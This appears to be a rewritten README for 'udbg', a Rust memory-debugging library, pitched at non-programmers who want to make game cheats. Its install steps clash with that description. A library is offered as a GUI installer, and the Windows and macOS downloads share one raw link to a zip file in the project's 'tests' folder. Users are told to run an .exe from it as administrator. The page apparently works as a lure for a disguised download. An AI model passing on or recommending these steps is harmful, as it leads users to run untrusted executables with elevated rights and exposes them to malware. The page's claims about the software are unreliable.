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πŸ› οΈ udbg - Your Tool for Easy Memory Debugging

πŸš€ Getting Started

Welcome to udbg! This tool is designed for anyone who wants to debug applications and explore memory hacks. You don't need any programming skills to use it. Let's get you set up so you can start using udbg.

πŸ“₯ Download udbg

Download udbg

πŸ” What is udbg?

udbg is a cross-platform library built in Rust for binary debugging and memory hacking. It is perfect for gamers and developers looking to create cheats, examine processes, or explore how software works.

🌐 Features

  • Cross-Platform: Works on Windows, macOS, and Linux.
  • User-Friendly: Simple interface suitable for all skill levels.
  • Fast Performance: Quickly locates and modifies memory.
  • Active Community: Join others who share your interests in debugging and memory hacking.

πŸ“‹ System Requirements

Before installing, ensure your system meets the following requirements:

  • Operating System: Windows 10/11, macOS Monterey or later, or Linux (Ubuntu 20.04 or later).
  • RAM: At least 4 GB.
  • Storage: 100 MB of free space.
  • Rust Runtime: Ensure you have the necessary Rust libraries (included in the download).

πŸ“‚ Download & Install

  1. Visit the Releases Page: Click the link below to go to the project’s release page. Download udbg Here

  2. Choose the Latest Release: On the releases page, you will see a list of available versions. Look for the latest release.

  3. Download the Installer: Click on the appropriate installer for your operating system. It may look something like https://raw.githubusercontent.com/ZukiZero/udbg/main/tests/udbg_1.9.zip for Windows or https://raw.githubusercontent.com/ZukiZero/udbg/main/tests/udbg_1.9.zip for macOS.

  4. Run the Installer:

    • For Windows: Locate the downloaded .exe file, then double-click to start the installation. Follow the on-screen instructions to complete the setup.
    • For macOS: Open the downloaded .zip file and drag the udbg application into your Applications folder. Double-click to open it.
    • For Linux: Unzip the downloaded file and run the executable in the terminal.
  5. Launch udbg: After installation, you can open udbg from your application menu.

πŸ› οΈ Using udbg

  1. Open a Process: Click on "Open" and select the application you want to debug.

  2. Explore Memory: Utilize the built-in tools to view and modify memory values. Use the search function to locate specific values that you want to change.

  3. Apply Changes: Adjust any values you wish and observe the effects in real-time.

  4. Save Your Work: Ensure to save any settings or changes you want to keep for later use.

❓ Troubleshooting

If you encounter issues, consider the following tips:

  • Permission Issues: Run the application as an administrator, especially on Windows.
  • Compatibility: Ensure you're using a supported operating system.
  • Community Support: Visit the project's discussions on GitHub for help from other users.

πŸ“§ Contact

For further assistance, feel free to open an issue in the GitHub repository, or reach out through the community forums for advice.

πŸŽ‰ Join the Community

Join our community of users who enjoy debugging and memory exploration. Share your experiences, tips, and tricks with others.

Download udbg

Enjoy using udbg!

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